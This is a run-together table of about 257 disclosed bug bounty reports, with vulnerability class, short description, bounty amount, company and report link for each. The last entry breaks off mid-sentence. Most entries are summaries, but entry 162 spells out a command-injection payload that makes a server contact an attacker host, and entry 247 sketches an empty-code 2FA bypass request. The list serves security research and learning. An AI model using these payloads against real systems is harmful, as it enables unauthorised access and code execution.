1IDORIDOR for order delivery address$3000Mail.ruhttps://hackerone.com/reports/7234612IDORIDOR to change API-key description$250Vismahttps://hackerone.com/reports/8099673SSRFSTUN SSRF$3500Slackhttps://hackerone.com/reports/3334194SQLiBlind SQLi through GET$5000Mail.ruhttps://hackerone.com/reports/786044 5SQLiBlind SQLi through GET$5000Mail.ruhttps://hackerone.com/reports/7952916SQLiBlind SQLi through GET$3000Mail.ruhttps://hackerone.com/reports/7324307SQLiSQLi$2200Mail.ruhttps://hackerone.com/reports/7387408SQLiBlind Boolean based SQLi through GET$300Mail.ruhttps://hackerone.com/reports/3981319Buffer OverflowBuffer Overflow　$1750Valvehttps://hackerone.com/reports/45892910Buffer OverflowBuffer Overflow　$10,000Valvehttps://hackerone.com/reports/542180 11CSRFCSRF in iOS app$2940Twitterhttps://hackerone.com/reports/80507312Open redirectPhishing Open Redirect$560Twitterhttps://hackerone.com/reports/78167313DoSDoS$560Twitterhttps://hackerone.com/reports/76745814DoSDoS$560Twitterhttps://hackerone.com/reports/768677 15Information leakPrivate key disclosed$2000Slackhttps://hackerone.com/reports/53103216Request SmugglingRequest Smuggling$6500Slackhttps://hackerone.com/reports/73714017Account TakeoverBrute force account takeover via recovery code$3000Mail.ruhttps://hackerone.com/reports/73006718Information leakArbitrary memory leak through API call$10,000Mail.ruhttps://hackerone.com/reports/51323619XSSBlind Stored XSS$600Mail.ruhttps://hackerone.com/reports/659760 20LFI (Information leak)Local File Inclusion$4000Starbuckshttps://hackerone.com/reports/78002121LFIArbitrary file inclusion & execution$1000Valvehttps://hackerone.com/reports/50889422Information leakLow impact information leak$500HackerOnehttps://hackerone.com/reports/82617623Insufficient security controlsCORS misconfiguration$1000SEMrushhttps://hackerone.com/reports/23520024Logic bugDomain authority regex logic bug$6000Googlehttps://bugs.xdavidhu.me/google/2020/03/08/the-unexpected-google-wide-domain-check-bypass/ 25Privilege escalationAbusing backup and restore function to escalate privileges$1500Ubiquiti Inchttps://hackerone.com/reports/32965926Privilege escalationArbritrary file deletion + DLL Hijacking leads to privilege escalation during install$667Ubiquiti Inchttps://hackerone.com/reports/53096727Information leakUnauthenticated API endpoint leaking holiday schedule of employees in China$4000Starbuckshttps://hackerone.com/reports/65924828Account takeoverChanging URL path from login to new-password allows merging victims store to attackers account$7500Shopifyhttps://hackerone.com/reports/79695629Improper access controlUnauthenticated API allows enumeration of user names & phone numbers$500Razerhttps://hackerone.com/reports/75244330Authentication bypassAuth bypass allowing access to support tickets$1500Razerhttps://hackerone.com/reports/77611031Privilege escalationSame as below, but change of email HAS to be completed before receiving the email verification request. Rewarded due to different root cause$15,000Shopifyhttps://hackerone.com/reports/79680832Privilege escalationTakeover any shopify store by registering email, sending email verification request, changing email and confirming request chain$15,000Shopifyhttps://hackerone.com/reports/79177533Command injectionAbusing relative paths to run custom scripts during startup$750Slackhttps://hackerone.com/reports/78471434Authentication bypassView webcam and run code in context of any webpage in Safari$75,000Applehttps://www.ryanpickren.com/webcam-hacking-overview35XSSStored XSS through chat message$300Vanillahttps://hackerone.com/reports/68379236IDORIDOR allows enumeration of users with connected google analytics or the amount of calendars owned by a single user$500SEMrushhttps://hackerone.com/reports/79768537Logic ErrorNegative values allowed for price parameters allowed for free goods$2111SEMrushhttps://hackerone.com/reports/77169438XSSStored XSS in customer chat$1000Shopifyhttps://hackerone.com/reports/79859939XSSXSS through FB Group integration$500Shopifyhttps://hackerone.com/reports/26757040SQLiError-based SQLi through GET$1500Mail.ruhttps://hackerone.com/reports/79000541SSRFBlind SSRF$150Mail.ruhttps://hackerone.com/reports/12029842IDORLeaking order information due to IDOR (No PII, only bought items)$150Mail.ruhttps://hackerone.com/reports/79128943Code injectionPHP injection through unserialize() leading to code execution$3000Mail.ruhttps://hackerone.com/reports/79813544Subdomain TakeoverDangling AWS Record allowed zone transfer, leading to access to cookies and CORS, which could facilitate phishing attacks$500Uberhttps://hackerone.com/reports/70774845Logic ErrorNo validation that user rated his own trips, meaning drivers could alter their ratings.$1500Uberhttps://hackerone.com/reports/72452246LFIUsing PDF-generator and an iframe, one could export the PDF with arbritrary file content$500Vismahttps://hackerone.com/reports/80981947XSSDom XSS in IE & Edge on main page$1000ForeScout Technologieshttps://hackerone.com/reports/70426648Logic ErrorOverwrite data as low privilege user, by renaming existing folder to the name of a folder you do not have access to$250NextCloudhttps://hackerone.com/reports/64251549Improper access controlUnauthenticated API allowed an attacker to change hostname of device$550UniFi Cloudhttps://hackerone.com/reports/80207950SQLiSQLi through multiple parameters, but in unused service. Data exfiltration possible.$2000Razerhttps://hackerone.com/reports/77769851SQLiSQLi through get parameter allowed for data exfiltration from Thai users.$2000Razerhttps://hackerone.com/reports/76819552SQLiSQLi allowing for access to data on Thai server.$2000Razerhttps://hackerone.com/reports/78120553SSRFSSRF that could have lead to compromise of server and significant data breach$2000Razerhttps://hackerone.com/reports/77766454Information leakPHP file with source code exposed. No exploit.$200Razerhttps://hackerone.com/reports/81973555CSRFCSRF token with 24h lifetime, leading to possibility of connecting attackers paypal with victims shopify account$500Shopifyhttps://hackerone.com/reports/80792456Code InjectionMacOS client is vulnerable to low-privilege attacker injecting code into the application using dylib. This is due to lack of setting the Hardened Runtime capability in XCODE$250NextCloudhttps://hackerone.com/reports/63326657Information leakCleartext storage of API keys & tokens. Very poorly handled.$750Zenlyhttps://hackerone.com/reports/75386858Improper access controlAWS Bucket access key transmitted in cleartext$300BCM Messengerhttps://hackerone.com/reports/76424359Improper access controlAble to add paid function for 14 days for free$200Codahttps://hackerone.com/reports/77794260XSSBlind XSS in admin panel through a partner’s superuser name$750Mail.ruhttps://hackerone.com/reports/74649761XSSBlind XSS in admin panel through a partner’s superuser name (Same issue, different endpoint)$750Mail.ruhttps://hackerone.com/reports/74650562SSRFSSRF & Local File Read via photo upload$6000Mail.ruhttps://hackerone.com/reports/74812863SSRFSSRF & Local File Read via photo retrieving functionality$6000Mail.ruhttps://hackerone.com/reports/74806964SSRFSSRF & Local File Read via photo editor$6000Mail.ruhttps://hackerone.com/reports/74812365Logic ErrorA partner account with manager role could withdraw money from driver’s account$8000Mail.ruhttps://hackerone.com/reports/75134766XSSReflected XSS through XML Namespace URI$500Mapboxhttps://hackerone.com/reports/78027767Code InjectionHTML Injection for IE only$500Mail.ruhttps://hackerone.com/reports/75710068DoSCache poisoning CORS allow origin header$550Automattichttps://hackerone.com/reports/59130269IDORRemote wipe of other users device$500Nextcloudhttps://hackerone.com/reports/81980770SSRFGitLab local instance SSRF bypass through DNS Rebinding in WebHooks$3500GitLabhttps://hackerone.com/reports/63210171LFIopenStream called on java.net.URL allows access to local resources when passing in file:// or jar://$1800GitHub Security Labhttps://hackerone.com/reports/84432772Logic BugNot checking if LINUX privilege is successfully dropped leads to increased attack surface$1800GitHub Security Labhttps://hackerone.com/reports/84572973SQLiArbitrary SQL queries via DocID parameter of Websocket API$1800GitHub Security Labhttps://hackerone.com/reports/85443974Logic BugAccount takeover through link injection in contact form$1000Insolarhttps://hackerone.com/reports/78674175Information leakAbility to see other shops product title, only if they are using a particular app and has an attachment$500Shopifyhttps://hackerone.com/reports/84862576XSSReflected XSS on API Server (No regular users browsing the page)$250Razerhttps://hackerone.com/reports/79194177Brute ForceCounter-specific (?) password was not protected against brute force attacks$150Mail.ruhttps://hackerone.com/reports/75453678Authentication bypassKnowing the victims phone number allowed access to partial information about the victims travel. Payment type, profile information, etc.$8000Mail.ruhttps://hackerone.com/reports/77211879Information leakAPI endpoint disclosed e-mails of subscribed users$250Mail.ruhttps://hackerone.com/reports/70308680DoSDoS & Unsafe Object creation through JSON parsing$500Rubyhttps://hackerone.com/reports/70693481Logic ErrorSession Expiration is not enforced during signup. Bypass can be done by deleting HTML element blocking progress$100Vismahttps://hackerone.com/reports/81040082Subdomain TakeoverSubdomain takeover due to expired / unclaimed Hubspot instance$2500Robloxhttps://hackerone.com/reports/33533083Information leakEndpoint vulnerable to Heartbleed$1500Uberhttps://hackerone.com/reports/30419084RCELFI through Path Traversal in image-tag in Markdown. Disclosure of local files leads to disclosure of secret, which can be used to achieve RCE through deserialization$20,000GitLabhttps://hackerone.com/reports/82705285Prototype PollutionSimple prototype pollution due to improper handling of zipObjectDeep$250Node.js Third Party Modules (lodash)https://hackerone.com/reports/71206586Information disclosureSession is not properly invalidated after logging out. When creating a store before upgrading your account, visitors are required to enter a password. This password is disclosed after logging out, when visiting a certain link.$500Shopifyhttps://hackerone.com/reports/83772987IDORAble to bypass ban restrictions through path normalization. APIs are also unrestricted$800Robloxhttps://hackerone.com/reports/70305888PhishingLink url falsification by altering post message$250Slackhttps://hackerone.com/reports/48147289Information leakLeaking (unrestricted?) Google API key$150Identifyhttps://hackerone.com/reports/72403990Improper access controlRead-only team members can read all properties of webhooks, through graphql$0HackerOnehttps://hackerone.com/reports/81884891DoSDoS through sending large message to the server$500Robloxhttps://hackerone.com/reports/67990792IDORAccess to log files based on IDOR through exposed signature in Razer Pay Android App$500Razerhttps://hackerone.com/reports/75404493Path TraversalMisconfiguration when handling URI paths allowed for docroot path traversal giving access to non-sensitive data usually not accessible to users$500Starbuckshttps://hackerone.com/reports/84406794Improper Certificate ValidationClient side traffic hijacking allowed for user data interception (Local?)$750Razerhttps://hackerone.com/reports/79527295Improper authorizationThe Razer Pay backend server could be exploited to obtain transaction details from another user$500Razerhttps://hackerone.com/reports/75433996SQLiRazer Pay API was vulnerable to SQLi exposing user information$2000Razerhttps://hackerone.com/reports/81111197Improper authorizationReverse engineering the Android app allowed for bypassing the signatures in place to prevent parameter tampering, discovering a variety of IDOR issues$1000Razerhttps://hackerone.com/reports/75328098HTTP Response SplittingLimited CRLF injection allowed for manipulation of cookies$150Mail.ruhttps://hackerone.com/reports/83868299IDORIssue with the marketplace due to length restriction in choosing hashing function$5000SEMrushhttps://hackerone.com/reports/837400100SSRFSSRF & LFI in Site Audit due to lack of connection protocol verification$2000SEMrushhttps://hackerone.com/reports/794099101SSL DowngradePossible to temporarily downgrade a victim from HTTPS to HTTP in Firefox. Required victim clicking a link and had a very short timeframe to be successful$500Uberhttps://hackerone.com/reports/221955102XSSReflected XSS due to outdated WordPress installation lead to exposure of sensitive form data and user data$4000Uberhttps://hackerone.com/reports/340431103Open RedirectOpen redirect in get parameter$50Unikrnhttps://hackerone.com/reports/625546104DoSBypassing character limitation on ´Moments´ feature and creating many of them leads to DoS$560Twitterhttps://hackerone.com/reports/819088105CRLF InjectionCRLF injection in urllib$1000Python (IBB)https://hackerone.com/reports/590020106Subdomain TakeoverOut of scope, no impact subdomain takeover of uptimerobot page$100BTFShttps://hackerone.com/reports/824909107SQLiBlind Boolean-based SQLi in Razer Gold TH$1000Razerhttps://hackerone.com/reports/790914108SSRFSSRF allowing port scanning of localhost through host header injection$300TTS Bug Bountyhttps://hackerone.com/reports/272095109Cryptographic IssuesA variety of WPA3 issues related to cryptography and logic$750The Internethttps://hackerone.com/reports/745276110XSSReflected XSS on resources.hackerone.com$500HackerOnehttps://hackerone.com/reports/840759111Information leakUn-minified JS code disclosed on some pages$250Imgurhttps://hackerone.com/reports/845677112XSSSelf-XSS to normal XSS by bypassing X-Frame-Options to automatically execute JS through loading content through iframes$250Pornhub.comhttps://hackerone.com/reports/761904113IDORA partner account could access another partner’s driver data through an IDOR$1500mail.ruhttps://hackerone.com/reports/747612114IDORA partner account could access information about other partners through an IDOR$1500mail.ruhttps://hackerone.com/reports/746513115IDORA partner with manager role could takeover a drive’s account belonging to a different partner$8000mail.ruhttps://hackerone.com/reports/751281116XSSStored XSS on messages to drivers through the operator interface$500mail.ruhttps://hackerone.com/reports/751263117Code ExecutionPHP Code Execution through image upload functionality$3000mail.ruhttps://hackerone.com/reports/854032118Improper Access ControlDelete projects from archived companies set to Read-Only.$100Vismahttps://hackerone.com/reports/849157119Information leakAccount takeover due to leaking auth URLs on google & leaking OTP in API response$500Badoohttps://hackerone.com/reports/746186120XSSStored XSS through file upload (.pdf → JS)$250Vismahttps://hackerone.com/reports/808862121Information leak404-page leaks all headers$500HackerOnehttps://hackerone.com/reports/792998122CSRFFriends Only account mode could be toggled through CSRF$250Mail.ruhttps://hackerone.com/reports/448928123Subdomain TakeoverPossible due to wildcard pointing to uberflip domain$500HackerOnehttps://hackerone.com/reports/863551124DoSImproper error handling leads to DoS and service failure in case of supplying invalid “Redirect_URI” parameter$1000GitLabhttps://hackerone.com/reports/702987125Information leakPrivate program invites can disclose emails of any user invited by using username$7500HackerOnehttps://hackerone.com/reports/807448126SSRFSSRF through notification configuration. Requires admin privileges$300Phabricatorhttps://hackerone.com/reports/850114127Improper Access ControlRead-only user without access to payroll, can still access the data by visiting the URL directly$250Vismahttps://hackerone.com/reports/838563128XSSCode does not sufficiently escape template expressions, allowing for XSS$500Ruby On Railshttps://hackerone.com/reports/474262129Information leakPotentially sensitive information leaked through debug interface$150Mail.ruhttps://hackerone.com/reports/748925130MisconfigurationNetwork restrictions on admin interface could be bypassed using alternate hostnames$150Mail.ruhttps://hackerone.com/reports/749677131Request SmugglingRequest smuggling poisoning users using Host header injection$750TTShttps://hackerone.com/reports/726773132Lack of security mechanismsLack of user warning when opening potentially dangerous files from the chat window$250Mail.ruhttps://hackerone.com/reports/633600133XSSReflected XSS in investor relations website due to unsanitized user input$350Razerhttps://hackerone.com/reports/801075134SQLiBlind SQLi due to no input sanitization on “Top Up” function in Razer Gold TH service$1000Razerhttps://hackerone.com/reports/789259135Subdomain TakeoverSubdomain takeover$250Razerhttps://hackerone.com/reports/810807136Open redirectOpen redirect in login flow$150TTShttps://hackerone.com/reports/798742137Race ConditionRace condition in email verification that awards in-game currency, leading to similar impact as payment bypass$2000InnoGameshttps://hackerone.com/reports/509629138Account TakeoverLinks on in-game forum leaks referer header, which contains CSRF token. The page also embeds links with the cookie value on the page. Utilizing self-xss combined with CSRF-token, you can grab cookie from DOM and send it to attacker resulting in Account Takeover$1100InnoGameshttps://hackerone.com/reports/604120139XSSReflected XSS due to insufficient input sanitation. Could allow for account takeover or user session manipulation.$1900PayPalhttps://hackerone.com/reports/753835140XSSStored XSS through bypass of file type upload limit by 0-byte. Uploading a xx.html%00.pdf with JS will work like a stored XSS when accessed$250Vismahttps://hackerone.com/reports/808821141Improper AuthenticationAn issue in how Cloudflare’s authoritative DNS server processes requests with “:” in it. This allows an attacker to spoof NXDOMAINs within safe zones.$400Open-Xchangehttps://hackerone.com/reports/858854142Improper Access ControlCan reply or delete replies from any users in any public group, without joining said group. (Buddypress)$225WordPresshttps://hackerone.com/reports/837256143Privilege EscalationAuthor role has access to edit, trash and add new items within the BuddyPress Emails.$225WordPresshttps://hackerone.com/reports/833782144CSRFProfile field CSRF allows for deleting any field in BuddyPress$225WordPresshttps://hackerone.com/reports/836187145Privilege EscalationIDOR + Changing parameter from “Moderator” to “Admin” leads to privilege escalation$225WordPresshttps://hackerone.com/reports/837018146Privilege EscalationChaining 5 vulnerabilities leads to privilege to root, by: Symlink attack combined with race condition leads to executing malicious code$500NordVPNhttps://hackerone.com/reports/767647147XSSReflected XSS evading WAF + confirming insufficient fix$1000Glassdoorhttps://hackerone.com/reports/846338148Information leakNew retest functionality discloses existence of private programs through having the tag added to the program description$500HackerOnehttps://hackerone.com/reports/871142149XSSOutdated PDF.js allows for XSS using CVE-2018-5158$100Nextcloudhttps://hackerone.com/reports/819863150DoSDoS due to having a large amount of groups and sending a tampered request (Changed Accept-Encoding & User-Agent)$500HackerOnehttps://hackerone.com/reports/861170151XSSStored XSS in user profile$200QIWIhttps://hackerone.com/reports/365093152Logic BugService time expiry validation bypass leads to unlimited use due to bypassing licensing time checks$400NordVPNhttps://hackerone.com/reports/865828153Improper Access ControlPrivilege escalation through improper access control on /membership/ endpoint$500Heliumhttps://hackerone.com/reports/809816154IDORSending invitations is vulnerable to IDOR attack, resulting in being able to invite any account as administrator of a organization, by knowing the organizations UUID$100Heliumhttps://hackerone.com/reports/835005155Improper Access ControlDcoker Registry API v2 exposed through HTTP, allowing for dumping & poisoning of docker images.$2000Semmlehttps://hackerone.com/reports/347296156Code InjectionCodeQL query to detect JNDI injections$2300GitHubhttps://hackerone.com/reports/892465157Information leakGraphQL query can disclose information about undisclosed reports to the HackerOne program due to the retest feature$2500HackerOnehttps://hackerone.com/reports/871749158Logic BugCodeQL query to detect improper URL handling$1800GitHubhttps://hackerone.com/reports/891268159Information leakCodeQL query to detect Spring Boot actuator endpoints$1800GitHubhttps://hackerone.com/reports/891266160Logic BugCodeeQL query to detect incorrect conversion between numeric types in GOLang$1800GitHubhttps://hackerone.com/reports/891265161Improper Access ControlCertain API methods were not properly restricted and leaked statistics about arbitrary domains$400Mail.ruhttps://hackerone.com/reports/831663162Code InjectionUsing chat commands functions like “/calculate 1+1” is possible, but it can be abused by using BASH syntax for executing commands “/calculate $(ping attacker.com)”, leading to arbitrary code execution$3000Nextcloudhttps://hackerone.com/reports/851807163Privilege EscalationCan invite members to a “clan” even when the user does not have access to that function$550InnoGameshttps://hackerone.com/reports/511275164XSSAirMax software was vulnerable to Reflected XSS on multiple end-points and parameters$150Ubiquiti inc.https://hackerone.com/reports/386570165Privilege EscalationChanging email parameter allows privilege escalation to admin$100Heliumhttps://hackerone.com/reports/813159166Information leakCodeQL query to detect logging of sensitive data$500GitHubhttps://hackerone.com/reports/886287167CSRFCSRF is possible in the AirMax software on multiple endpoints leading to possible firmware downgrade, config modification, file or token ex-filtration etc.$1100Ubiquiti inc.https://hackerone.com/reports/323852168Account TakeoverNo brute-force protection on SMS verification endpoint lead to account takeover$1700Mail.ruhttps://hackerone.com/reports/744662169IDORAPI allowed for leaking information on job seekers / employers through IDOR$500Mail.ruhttps://hackerone.com/reports/743687170XSSReflected XSS through URI on 404 page$300Mail.ruhttps://hackerone.com/reports/797717171SSRFSSRF through using functionality from included library that should be disabled$10,000GitLabhttps://hackerone.com/reports/826361172Information leakInsufficient verification leads to ability to read sensitive files$10,000GitLabhttps://hackerone.com/reports/850447173Improper AuthenticationCould impersonate and answer tickets belonging to other users$550InnoGameshttps://hackerone.com/reports/876573174Subdomain TakeoverSubdomain takeover of iosota.razersynapse.com$200Razerhttps://hackerone.com/reports/813313175XSSReflected xss through cookies on ftp server for Thai employees$375Razerhttps://hackerone.com/reports/748217176XSSOut of scope DOM XSS leading to impact on account security for in scope asset. Only applicable to IE and Edge.$750Rockstar Gameshttps://hackerone.com/reports/663312177SQLiSearch function was crashable disclosing error logs with useful information for other potential attacks.$250Rockstar Gameshttps://hackerone.com/reports/808832178Open RedirectCould potentially leak sensitive tokens through referer header on GTA Online sub-site.$750Rockstar Gameshttps://hackerone.com/reports/798121179XSSDOM XSS in GTA Online feedback endpoint. Other issues with the same root cause was also found on the same site.$1250Rockstar Gameshttps://hackerone.com/reports/803934180DoSIn email verification emails, the unique number is assigned sequentially, meaning you can invalidate all future registrations by visiting the following URL. Ex: confirmmail/1/jfaiu -> confirmmail/2/jfaiu$150Vanillahttps://hackerone.com/reports/329209181Information leakExternal images could be referenced in the screenshot utility feature, possibly leading to FaceBook OAUTH token theft$500Rockstar Gameshttps://hackerone.com/reports/497655182XSSDom XSS on main page achieved through multiple minor issues, like path traversal and open redirect$850Rockstar Gameshttps://hackerone.com/reports/475442183XSSStored XSS through demo function in multiple parameters using javascript scheme$750Shopifyhttps://hackerone.com/reports/439912184Improper access controlAfter removing admin access from an account, it can still make changes with admin permissions until logged out. The account can also still make changes to embedded apps, but this is by design.$1000Shopifyhttps://hackerone.com/reports/273099185CSRFAccount takeover on social club by using CSRF to link an account to the attackers facebook account, leading to the ability to login as the victim$1000Rockstar Gameshttps://hackerone.com/reports/474833186XSSReflected XSS due to decoding and executing code after the last “/” on GTAOnline/jp.$750Rockstar Gameshttps://hackerone.com/reports/507494187Open RedirectOpen Redirect on the support page, impacting the mobile page$750Rockstar gameshttps://hackerone.com/reports/781718188XSSDOM XSS on GTAOnline. Regressed Directory Traversal and new XSS issue$750Rockstar gameshttps://hackerone.com/reports/479612189Race Condition (TOCTOU)Can click “This Rocks” (like) button any number of times, allowing an attacker to fill up the victims notification feed$250Rockstar gameshttps://hackerone.com/reports/474021190XSSDOM XSS in the video section of GTAOnline page through returnurl-parameter, only exploitable on non-English versions.$750Rockstar gameshttps://hackerone.com/reports/505157191CSRFCSRF on login page only, due to processing credentials before checking for CSRF protections. This is also only valid when forcing non 4xx responses from the server$500HackerOnehttps://hackerone.com/reports/834366192RCERCE Through Blind SQLI in Where clause$5500QIWIhttps://hackerone.com/reports/816254193RCERCE Through Blind SQLI in Where clause$1000QIWIhttps://hackerone.com/reports/816560194RCERCE through Blind SQLI in prepared statement$1000QIWIhttps://hackerone.com/reports/816086195IDORRead-only user can change name of device in admin account$50Heliumhttps://hackerone.com/reports/865115196Path TraversalAccess to restricted data through path traversal (requires valid authentication cookie)$4000Starbuckshttps://hackerone.com/reports/876295197XSSCombining two minor harmless injections results in dom based Reflected XSS$250Starbuckshttps://hackerone.com/reports/396493198XSSBypass of previous issue by encoding ” as %2522$250Starbuckshttps://hackerone.com/reports/252908199SQLiBlind, time-based SQLi due to unsafe handling of GET parameter$15,000Mail.ruhttps://hackerone.com/reports/868436200SSRFBy being able to redirect key lookups (since they are on your own domain and the lookup is done over DNS), you can trick the sending server into accessing arbitrary addresses.$400Open-Xchangehttps://hackerone.com/reports/792960201SSRFSame as 201 but through different code. Being able to control DNS records for your own domain, you can redirect servers accessing your domain to get your public key into returning data from an internal asset.$400Open-Xchangehttps://hackerone.com/reports/792953202XSSDOM XSS through XSS payload in UID field of key. Exploited by sending key to the victim, which then imports it.$500Open-Xchangehttps://hackerone.com/reports/788691203Information disclosureAttacker can leak OAUTH token due to redirect_uri not properly detecting IDN Homograph attacks (Unicode character confusion attack – é = e)$1000SEMrushhttps://hackerone.com/reports/861940204DoSDoS through no length restriction on the “instruction” field when creating a new program.$2500HackerOnehttps://hackerone.com/reports/887321205CSRFCSRF token is not checked$250Vismahttps://hackerone.com/reports/878443206Path TraversalBy executing a path traversal attack on the frontend, arbitrary API calls on the (internal only) backend was possible. This lead to being able to enumerate 100 million real users.$4000Starbuckshttps://samcurry.net/hacking-starbucks/207Privacy ViolationIncorrect usage of Google AD ID integration lead to privacy issue$200NordVPNhttps://hackerone.com/reports/803941208Insecure design principlesIncluding vendor based eval-stdin.php leads to potential RCE$100NextCloudhttps://hackerone.com/reports/820146209CSRFLack of CSRF protection when linking FaceBook account with Social Club account, lead to potential takeover. Required preconditions and deception to succeed.$550Rockstar Gameshttps://hackerone.com/reports/653254210Information Disclosurea chain of vulnerabilities leads to being able to possibly exfiltrate user tokens. One part was image injection in Screenshot-View function.$500Rockstar Gameshttps://hackerone.com/reports/655288211Information DisclosureImage injection in www.rockstargames.com/bully/screens could be combined with other minor issues to leak user tokens.$500Rockstar Gameshttps://hackerone.com/reports/661646212XSSDOM XSS in localized (different languages) Red Dead Redemption 2 video viewer. www.rockstargames.com/reddeadredemption2/br/videos$750Rockstar Gameshttps://hackerone.com/reports/488108213CSRFCSRF issue in language changing function for GTA Online could be chained with other vulnerabilities to leak user tokens.$500Rockstar Gameshttps://hackerone.com/reports/809691214Information DisclosureImage injection on www.rockstargames.com/bully/anniversaryedition. Could be combined with other issues to leak user tokens.$500Rockstar Gameshttps://hackerone.com/reports/498358215Information DisclosureImage injection-fix bypass in the screenshot-viewer utility$500Rockstar Gameshttps://hackerone.com/reports/505259216Information DisclosureAnother Image injection-fix bypass in the screenshot-viewer utility$500Rockstar Gameshttps://hackerone.com/reports/506126217XSSFlash file based Open Redirect and XSS vulnerability.$500Rockstar Gameshttps://hackerone.com/reports/485382218Open RedirectOpen Redirect in changing language functionality on https://www.rockstargames.com/GTAOnline. This could be used to leak sensitive tokens from the URL through Referer header.$500Rockstar Gameshttps://hackerone.com/reports/870062219XSSLocalized (different languages) versions of https://www.rockstargames.com/GTAOnline/ was vulnerable to DOM XSS in various locations. This combined with Open Redirect allowed for user token exfiltration.$750Rockstar Gameshttps://hackerone.com/reports/508517220Information DisclosureImage injection on localized (different languages) versions of games/info endpoint (https://www.rockstargames.com/br/#/games/info). This could lead to leaking user tokens through Referer header.$500Rockstar Gameshttps://hackerone.com/reports/510388221Information DisclosureAttack chain leading to leaking OAUTH tokens. Image injection in https://www.rockstargames.com/bully/anniversaryedition combined with other minor issues allowed for this attack to be successful.$500Rockstar Gameshttps://hackerone.com/reports/659784222XSSDOM XSS in localized versions of GTA Online screenshot site, like the following: https://www.rockstargames.com/GTAOnline/jp/screens/$750Rockstar Gameshttps://hackerone.com/reports/508475223XSSDOM XSS in www.rockstargames.com/GTAOnline/features/freemode$750Rockstar Gameshttps://hackerone.com/reports/799739224Improper AuthenticationHost(origin) checking of Digits SDK passes attacker controlled string to function expecting regex, leading to using regex-specific characters in the domain name allowing for bypassing the check. (“.” matching any character). The impact was account takeover.$5040Twitterhttps://hackerone.com/reports/129873225CSRFUser token leak through referer header, by abusing vulnerable chain of issues. This was due to insufficient refer header policy. The url was extracted through abusing an Open Redirect issue. The vulnerable endpoint was socialclub.rockstargames.com/crew/$750Rockstar Gameshttps://hackerone.com/reports/787160226CSRFLeaking user tokens through referer header by exploiting a chain of issues. The part handled in this report is Image injection leading to XSS on https://www.rockstargames.com/newswire/article$750Rockstar Gameshttps://hackerone.com/reports/790465227CSRFImage injection on www.rockstargames.com/IV/screens/1280x720Image.html can be combined with other issues to leak user tokens.$500Rockstar Gameshttps://hackerone.com/reports/784101228Information disclosureImage injection on https://www.rockstargames.com/careers#/offices/. Combined in a chain with other attacks could lead to leaking user tokens.$500Rockstar Gameshttps://hackerone.com/reports/491654229Insufficient Session ExpirationNo session invalidation after logout. Attacker can reuse known tokens$100Vismahttps://hackerone.com/reports/808731230Remote File InclusionRemote file inclusion through downloading file from chat. Uses path traversal to extract anywhere, and it can be hidden by setting a title for the file.$5000Keybasehttps://hackerone.com/reports/713006231Insecure Design PrinciplesUsing RTLO (Right to left override) character allows spoofing the URL that will be displayed when navigating out of rinkerboats.vanillacommunities.com leading to potential phishing / other attacks.$150Vanillahttps://hackerone.com/reports/563268232XSSStored XSS in the Customer Number field.$250Vismahttps://hackerone.com/reports/882189233Information disclosureCodeQL query to detect J2EE server having directory listing enabled, potentially allowing for source code disclosure.$1800Github Security Labhttps://hackerone.com/reports/909374234XSSXSS in account.mail.ru due to unsafe handling of GET parameter (User-assisted == Requires user interaction?)$1000Mail.ruhttps://hackerone.com/reports/889874235Information leakMySQL credentials leaked to publicly available config file$150Mail.ruhttps://hackerone.com/reports/879389236SSRFSSRF through using the relap.io function allowing for fetching external resources, allowing access to the production network in a transparent manner. (Non-blind)$1700Mail.ruhttps://hackerone.com/reports/739962237XSSStored XSS by authenticated user to all other users through the /wp-admin/edit.php?post_type=forum endpoint$225WordPresshttps://hackerone.com/reports/881918238Information leakA misconfigured web directory disclosed files that showed NordVPNs public proxy list and corresponding port numbers$50NordVPNhttps://hackerone.com/reports/791826239Privilege EscalationAn attacker can kick out any other member of any organization, given that they know the membership ID of the user. This is due to an IDOR in the delete membership functionality, which can be triggered by: DELETE /api/memberships/id$100Heliumhttps://hackerone.com/reports/810320240Command InjectionReflected XSS in certain endpoints allows account takeover. Attackers can also perform sensitive actions on behalf of authenticated users.$594Ubiquiti Inc.https://hackerone.com/reports/661647241Command InjectionCertain end-points are vulnerable to command injection when using specifically crafted input, leading to RCE. This vulnerability can be triggered through other vulnerabilities, like XSS and CSRF.$6839Ubiquiti Inc.https://hackerone.com/reports/703659242Logic bugBat files and other malicious executables (or any other filetypes and content) can be concealed as normal content, like .csv files by including illegal characters as content.$1500Slackhttps://hackerone.com/reports/833080243XSSXSS through unsafe URI handling in ASP.net on base starbucks.com domain$500Starbuckshttps://hackerone.com/reports/881115244BruteforceUser passwords can be brute forced due to lack of rate limiting$700Twitterhttps://hackerone.com/reports/854424245Request Smugglingconsole.helium.com is vulnerable to CL.TE request smuggling.$500Heliumhttps://hackerone.com/reports/867952246CSRFCSRF allowing an attacker to import any novel to the victims chatstory (pixiv service)$500Pixivhttps://hackerone.com/reports/534908247Improper Authentication2FA bypass by not supplying a 2FA code. Likely lack of null check. Vulnerable request is likely something like this: "email":"[email protected]","2FA":""$1000Glassdoorhttps://hackerone.com/reports/897385248Logic BugUsers are able for forge requests, leading to being able to spawn additional units at will. This is done through (what looks like) a leaked secret and a lack of proper server side validation.$1100InnoGameshttps://hackerone.com/reports/802636249Open RedirectOpen redirect requiring user to click in order to work$100LocalTapiolahttps://hackerone.com/reports/194017250Insecure design principlesCodeQL query to check for improper SSL certificates$1800GitHubhttps://hackerone.com/reports/917454251Command injectionCodeQL query to detect OGNL injection$2300Githubhttps://hackerone.com/reports/917455252Use after freeA use-after-free vulnerability exists in the IPV6 option of setsockopt, as it is possible to race and free the struct_ip6_pktopts buffer (TOCTOU) while it is being handled by ip6_setpktopt. This struct contains pointers that can be used for R/W primitives in the kernel. Combining this vulnerability with a known WebKit issue allows for easy exploitation.$10,000PlayStationhttps://hackerone.com/reports/826026253CSRF/community/create-post.js was vulnerable to CSRF attacks, allowing an attacker to spam the community boards as other users. This attack was only possible through Chrome.$150Rockstar Gameshttps://hackerone.com/reports/487378254CSRFhttps://www.rockstargames.com/reddeadonline/feedback/submit.json was vulnerable to CSRF attacks and could be exploited through a remote server. This attack was only possible through Chrome.$150Rockstar Gameshttps://hackerone.com/reports/796295255LFILFI of files with .md extension from /var/www/dashboard/new/ was possible. In addition, remote file inclusion from github was possible due to the default value of $docs_path, leading to XSS.$300TTS Bug Bountyhttps://hackerone.com/reports/895972256Logic BugUnlimited file upload in the image assigned to a contact leads to XSS by uploading malicious SVG.$100Nextcloudhttps://hackerone.com/reports/808287257CRLF InjectionMalicious users (non-admins) can write to memcached when using a malicious URL as a 